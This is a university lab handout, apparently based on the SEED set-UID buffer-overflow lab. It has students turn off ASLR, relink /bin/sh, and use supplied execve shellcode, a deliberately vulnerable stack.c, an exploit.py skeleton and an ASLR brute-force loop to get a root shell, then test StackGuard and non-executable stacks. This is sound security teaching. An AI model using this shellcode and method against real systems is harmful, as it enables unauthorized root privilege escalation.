Important
If you shutdown your VM, you will need to turn off address space randomization again the next time you start the VM.
This lab is designed to give you hands on experience working with buffer-overflow vulnerabilities.
A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers. A malicious user can utilize this type of vulnerability to alter the control flow of the program, and even to execute arbitrary pieces of code. This type of vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.
In this lab you will be given a program with a a buffer overflow vulnerability. Your task is to exploit the vulnerability and gain root priviledge on the system. In addition you will work with several protection systems that have been designed to prevent buffer overflow attacks. You will be evaulating why these systems work, and how well they work.
This lab requires familiarity with gcc
and gdb
. If you are uncomfortable with these tools, please reach out to the TAs on piazza.
You should also review the lab videos and the simplified buffer overflow example video which is available here.
You must read this entire document, and watch the videos before asking for help on this lab. If you have not done so, you will be directed to do that before help is offered.
All work for this lab will be done on the lab VMs.
Please be sure to take a snapshot of your VM before starting this lab.
If you are using the online VMs please follow these directions. Note: Do NOT take a snapshot of the virtual machine's memory. This will cause massive slowdowns in later labs.
If you are using VirtualBox please look at steps 40 onward in @50, or follow these directions
In your VM, download and extract the lab setup files for this lab from the SEED website. This will be the buffer overflow attak lab (set-uid version). https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Labsetup.zip
Optionally, you can use wget
from the terminal inside the VM.
$ wget https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Labsetup.zip
The lab VM runs Ubuntu 20.04. Ubuntu (and most other Linux distributions) implement serveral security mechanisms to prevent buffer overflow attacks. To make our attacks easier, we need to disable them. Later in the lab, we will re-enable the protections to see if our attacks are still successful.
One of the critial steps of a buffer overflow is guessing the addresses of the heap and stack. Linux based systems use address space randomization to randomize the starting address of the heap and stack. This makes guessing the exact addresses difficult. Address space randomization can be disabled with the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
Its never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to breakdown what the commands do.
sudo
means "run the following command as a superuser". The following command will run with a
higher set of priviledges than the normal user account. (Like an administrator on Windows systems).
sysctl
is a command used to edit the kernel (core system) settings.
-w
is a flag (or modifer) to the command. Here, it tells the sysctl
command that
we want to write (or update) a value.
kernel.randomize_va_space=0
sets the value of the randomize address space setting to 0 (or
false).
You can check out this link for more information on kernel settings.
If you shutdown your VM, you will need to turn off address space randomization again the next time you start the VM.
The dash shell in Ubuntu 20.04 has a countermeasure that prevents itself from being executed in a Set-UID process. If dash detects that it is executed in a Set-UID process, it immediately changes the effective user ID to the process's real user ID, essentially dropping the privilege. Since the vulnerable program we are attacking makes use of Set-UID priviledges, this is an issue.
This attack relies on running /bin/sh
, which is linked to the dash
shell. Instead we can change the shell that /bin/sh
links to to a shell that doesn't have the same countermeasure. One such shell is zsh
which is already installed on the VM.
$ sudo rm /bin/sh
$ sudo ln -sf /bin/zsh /bin/sh
Its never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to breakdown what the commands do.
sudo
means "run the following command as a superuser". The following command will run with a
higher set of priviledges than the normal user account. (Like an administrator on Windows systems).
rm
is the remove command. It deletes files.
/bin/sh
is the file we want to delete. It currently links to the wrong shell.
The 2nd command links the /bin/zsh
file to the /bin/sh
file. This way, when out
program executes /bin/sh
it will actually call the zsh
shell.
The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program's privilege. This malicious code is called shellcode, because it typically starts a command shell, from where the hacker can control the machine.
Our shellcode for this attack is going to call the /bin/sh
shell. If we were to implement simmilar code in a high level programming language (C) it would look like this:
#include <stdio.h>
int main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Unfortunalty we can't just compile this code and use the binary code as our shellcode. The best way to write shellcode is to use assembly code. In this lab, only a binary version of the shellcode is provided, without explaining exactly how it works (it is non-trivial). If you are interested in how exactly shellcode works and you want to write a shellcode from scratch, you can learn that from a separate SEED lab called Shellcode Lab. (nb: You may also ask the TAs to review this shellcode with you)
A naive thought is to compile the above code into binary, and then save it to the input file badfile. We then set the targeted return address field to the address of the main() function, so when the vulnerable program returns, it jumps to the entrance of the above code. Unfortunately this does not work for several reasons.
Before a normal program runs, it needs to be loaded into memory and its running environment needs to be set up. These jobs are conducted by the OS loader, which is responsible for setting up the memory (such as stack and heap), copying the program into memory, invoking the dynamic linker to link to the needed library functions, etc. After all the initialization is done, the main() function will be triggered. If any of the steps is missing, the program will not be able to run correctly. In a buffer overflow attack, the malicious code is not loaded by the OS; it is loaded directly via memory copy. Therefore, all the essential initialization steps are missing; even if we can jump to the main() function, we will not be able to get the shell program to run.
String copying (e.g. using strcpy()) will stop when a zero is found in the source string. When we compile the above C code into binary, at least three zeros will exist in the binary code:
; Store the command on stack
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp ; ebx --> "/bin//sh": execve()'s 1st argument
; Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] --> "/bin//sh"
mov ecx, esp ; ecx --> argv[]: execve()'s 2nd argument
; For environment variable
xor edx, edx ; edx = 0: execve()'s 3rd argument
; Invoke execve()
xor eax, eax ;
mov al, 0x0b ; execve()'s system call number
int 0x80
This shellcode is sparsly commented, and it should be enough that you can get a high level overview of what is happening. Simply put, we are invoking the execve()
system call to execute /bin/sh
. Some things to note:
The third instruction pushes //sh
, rather than /sh
into the stack. This is because we need a 32-bit number here, and /sh
has only 24 bits. Fortunately, //
is equivalent to /
, so we can get away with a double slash symbol.
We need to pass three arguments to execve()
via the ebx
, ecx
and edx
registers, respectively. The majority of the shellcode basically constructs the content for these three arguments.
The system call execve()
is called when we set al
to 0x0b
, and execute int 0x80
.
The 64 bit shellcode is provided below. It's very simmilar to the 32 bit shellcode, but some of the registers are different. Like above, you don't need to fully understand what it does, but a high level overview is provided in the comments.
xor rdx, rdx ; rdx = 0: execve()'s 3rd argument
push rdx
mov rax, '/bin//sh' ; the command we want to run
push rax ;
mov rdi, rsp ; rdi --> "/bin//sh": execve()'s 1st arg
push rdx ; argv[1] = 0
push rdi ; argv[0] --> "/bin//sh"
mov rsi, rsp ; rsi --> argv[]: execve()'s 2nd argument
xor rax, rax
mov al, 0x3b ; execve()'s system call number
syscall
This lab provides you with the generated binary code from the assembly code above. The code can be found in a C program called call_shellcode.c inside the shellcode folder.
This code is provided to you so that you can ensure that the shellcode provides an actual shell. It may come in handy during the debugging process.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char shellcode[] =
#if __x86_64__
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
#else
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80"
#endif
;
int main(int argc, char **argv) {
char code[500];
strcpy(code, shellcode); // Copy the shellcode to the stack
int (*func)() = (int(*)())code;
func(); // Invoke the shellcode from the stack
return 1;
}
The code above includes two copies of shellcode, one is 32-bit and the other is 64-bit. When we compile the program using the -m32
flag, the 32-bit version will be used; without this flag, the 64-bit version will be used. Using the provided Makefile, you can compile the code by typing make. Two binaries will be created, a32.out
(32-bit) and a64.out
(64-bit). It should be noted that the compilation uses the execstack option, which allows code to be executed from the stack; without this option, the program will fail.
You can run the resulting programs to ensure that they work correctly and give you a shell.
You will need to copy and paste this bytecode into your attacking program.
The vulnerable program used in this lab is called stack.c
. This program has a buffer-overflow vulnerability, your task is to exploit this vulnerability and gain the root privilege. The code listed below has some non-essential information removed, so it is slightly different from what is provided in the lab setup files.
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif
int bof(char *input_array)
{
char vulnerable_buffer[BUF_SIZE];
/* The following statement has a buffer overflow problem */
strcpy(vulnerable_buffer, input_array);
return 1;
}
int main(int argc, char **argv)
{
char input_array[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(input_array, sizeof(char), 517, badfile);
bof(input_array);
printf("Returned Properly\n");
return 1;
}
This program first reads an input from a file called badfile
, and then passes this input to another buffer in the function bof()
. The original input can have a maximum length of 517 bytes, but the buffer in bof()
is only BUF_SIZE
bytes long, which is less than 517. Because strcpy()
does not check boundaries, a buffer overflow will occur. Since this program is a root-owned Set-UID program, if a normal user can exploit this buffer overflow vulnerability, the user might be able to get a root shell.
This program gets its input from a file called "badfile". The user is able to write to and modify this file. The primary objective of this lab is to create the contents for badfile, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.
The easiest way to compile this program is to use the included Makefile. Just type make
in the target directory and the required program will be compiled. The variables L1, ..., L4 are set in Makefile. They will be used during the compilation.
You will need to edit the makefile to set the values to the following:
L1: 150
L2: 200
L3: 300
L4: 10
To compile the vulnerable program, you need to turn off the StackGuard and the non-executable stack
protections using the -fno-stack-protector
and -z execstack
options. After the
compilation, we need to make the program a root-owned Set-UID program.
We can achive this by first change the ownership of the program to root:
sudo chown root stack
and then change the permissions to enable the Set-UID bit:
sudo chmod 4755 stack
. You need to change ownership before turning on the Set-UID bit,
otherwise the ownership change will cause the Set-UID bit to be turned off.
To exploit the buffer overflow vulnerability in the target program, the most important thing to know is the distance between the buffer's starting position and the place where the return-address is stored. We can use a debugger to find these values. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug. If you used make
to compile the code, the you should already have a stack-L1-dbg
executable file.
Before you begin, make sure you create the badfile.
Note, the $
indicates the shell prompt, the //
are comments and should not be typed in. They are included for your understanding.
$ touch badfile //This will create an empty badfile.
$ gdb stack-L1-dbg gdb-peda
$ b bof //Set a breakpoint at the start of the bof function.
$ run
$ next //See below for why we have to do this.
$ p $ebp //Get the value for the ebp register.
$ p &buffer //Print the address of the buffer.
$ quit
next
?When gdb stops inside the bof()
function, it stops before the ebp
register is
set to point
to the current stack frame, so if we print out the value of ebp
here, we will get the
caller's ebp
value. We need to use next to execute a few instructions and stop after the ebp
register is
modified to
point to the stack frame of the bof()
function.
To exploit the buffer-overflow vulnerability in the target program, we need to prepare a payload, and save it inside badfile. We will use a python script to help us with this. A skeleton script called exploit.py
is provided for you. You will need to make some changes for it to work correctly.
#!/usr/bin/python3
import sys
shellcode= ( "" #CHANGE THIS! You can get the correct bytecode from the earlier files
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
################################################################
# Put the shellcode somewhere in the payload
start = 0 # ✩ Need to change ✩
content[start:start + len(shellcode)] = shellcode
# Decide the return address value
# and put it somewhere in the payload
ret = 0x00 #CHANGE THIS!
offset = 0 #CHANGE THIS!
L = 4 # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
f.write(content)
In your lab report, in addition to providing screenshots to demonstrate your investigation and attack, you also need to explain how the values used in your exploit.py
are decided. These values are the most important part of the attack, so a detailed explanation can when grading report. Only demonstrating a successful attack without explaining why the attack works will not receive any points.
Submit, along with your lab report, the completed exploit.py program, and the “badfile” you produced. In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
content = bytearray(0x90 for i in range(517))
stack.c
were 50
characters rather than 500.
In the Level-1 attack we used gdb to calculate the size of the buffer. In the real world, this piece of information may be hard to get. For example, if the target is a server program running on a remote machine, we will not be able to get a copy of the binary or source code. In this task, we are going to add a constraint: you can still use gdb, but you are not allowed to derive the buffer size from your investigation. Additionally, the buffer size is provided in Makefile, but you are not allowed to use that information in your attack. Your task is to get the vulnerable program to run your shellcode under this constraint.
You know the range of the buffer is between 100 to 200 bytes. You also know that due to the memory alignment, the value stored in the frame pointer is always multiple of four (for 32-bit programs).
You are only allowed to construct one payload that works for any buffer size within this range. You will not get full credit if you use the brute-force method, i.e., trying one buffer size each time. You should minimize the amount of times you need to run exploit.py
. The more you try, the easier it will be detected and stopped by the target. In your lab report, you need to describe your method, and provide evidence of success.
Submit, along with your lab report, the completed exploit.py program (named exploitL2.py In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
In this task, you will be attacking a 64-bit program called stack-L3
. Using gdb to conduct an investigation on 64-bit programs is the same as that on 32-bit programs. The only difference is the name of the register for the frame pointer. In the x86 architecture (32-bit programs), the frame pointer is ebp
, while in the x64 architecture, it is rbp
. Similar to the previous task, a detailed explanation of your attack needs to be provided in the lab report.
Compared to buffer-overflow attacks on 32-bit machines, attacks on 64-bit machines are more difficult; This is due to the addressing. Although the x64 architecture supports 64-bit address space, only the address from 0x00
through 0x00007FFFFFFFFFFF
is allowed. That means for every address (8 bytes), the highest two bytes are always zeros. This causes a problem. In our buffer-overflow attacks, we need to store at least one address in the payload, and the payload will be copied into the stack via strcpy()
. We know that the strcpy()
function will stop copying when it sees a zero. Therefore, if zero appears in the middle of the payload, the content after the zero cannot be copied into the stack. How to solve this problem is the most difficult challenge in this attack.
Submit, along with your lab report, the completed exploit.py program (named exploitL3.py In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
This step is extra credit. It is quite challenging!
The target program (stack-L4
) in this task is similar to the one in the Level 3, except that the buffer size is extremely small. The buffer size is set to 10, while in Level 3, the buffer size is much larger. Your goal is the same: get the root shell by attacking this program. You may encounter additional challenges in this attack due to the small buffer size. If that is the case, you need to explain how your have solved those challenges in your attack.
Submit, along with your lab report, the completed exploit.py program (named exploitL4.py In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524, 288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this task, you will use such an approach to defeat the address randomization countermeasure on a 32-bit system.
First turn Ubunut's address space randomization back on:
$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
Its never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to breakdown what the commands do.
sudo
means "run the following command as a superuser". The following command will run with a
higher set of priviledges than the normal user account. (Like an administrator on Windows systems).
sysctl
is a command used to edit the kernel (core system) settings.
-w
is a flag (or modifer) to the command. Here, it tells the sysctl
command
that
we want to write (or update) a value.
kernel.randomize_va_space=2
sets the value of the randomize address space setting to 2
(Enable mmap base, stack, VDSO page, and heap randomization).
You can check out this link for more information on kernel settings.
We can then use the brute-force approach to attack the vulnerable program repeatedly, hoping that the address we put in the badfile can eventually be correct. We will only try this on stack-L1
, which is a 32-bit program. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a few minutes, but if you are very unlucky, it may take longer.
#!/bin/bash
SECONDS=0
value=0
while true; do
value=$(( $value + 1 ))
duration=$SECONDS
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."
./stack-L1
done
Brute-force attacks on 64-bit programs are much harder, because the entropy is much larger. Although this is not required, feel free to try it just for fun. Let it run overnight. Who knows, you might get very lucky.
In your lab report, include the following:
Before working on this task, remember to turn off the address randomization first (instructions are provided in section 2), or you will not know which safeguard helps achieve the protection.
In our previous tasks, we disabled the “Stack Guard” protection mechanism in GCC when compiling the programs. In this task, you may consider repeating task 1 in the presence of Stack Guard. To do that, you should compile the program without the -fno-stack-protector
option. For this task, you will recompile the vulnerable program, stack.c, to use GCC's Stack Guard, execute task 1 again, and report your observations.
You may report any error messages you observe.
In your lab report, include the following:
Before working on this task, remember to turn off the address randomization first (instructions are provided in section 2), or you will not know which safeguard helps achieve the protection.
In our previous tasks, we intentionally make stacks executable. In this task, we recompile our vulnerable program using the noexecstack
option, and repeat the attack in Task 1. Can you get a shell? If not, what is the problem? How does this protection scheme make your attack difficult? You should describe your observations and explanations in your lab report.
It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example. There is a seperate SEED lab for that, and example vurnurable programs can be found online if interested.
Whether the non-executable stack protection works or not depends on the CPU and the setting of your virtual machine, because this protection depends on a hardware feature that is provided by the CPU. If you find that the non-executable stack protection does not work, you may need to do some manual troubleshooting.
In your lab report, include the following:
noexecstack
option, and the results of a single run of the program with that protection active.You will need to submit a written lab report through UBLearns, containing all of the deliverable elements above, by the due date specified in UBLearns. You are encouraged to explore beyond what is required by the lab.
Deliverables | Points |
---|---|
Working L1 program obtaining root shell | 10 |
5.2.1 | 1 |
5.2.2 | 3 |
5.2.3 | 3 |
5.2.4 | 3 |
6.1 | 3 |
6.2 | 3 |
7.1 | 3 |
7.2 | 3 |
8.1 | Extra Credit - 5 |
8.2 | Extra Credit - 5 |
9.1 | 1 |
9.2 | 3 |
9.3 | 3 |
9.4 | 3 |
9.5 | 1 |
10.1 | 1 |
10.2 | 3 |
10.3 | 3 |
11.1 | 1 |
11.2 | 3 |
Total | 54(64) |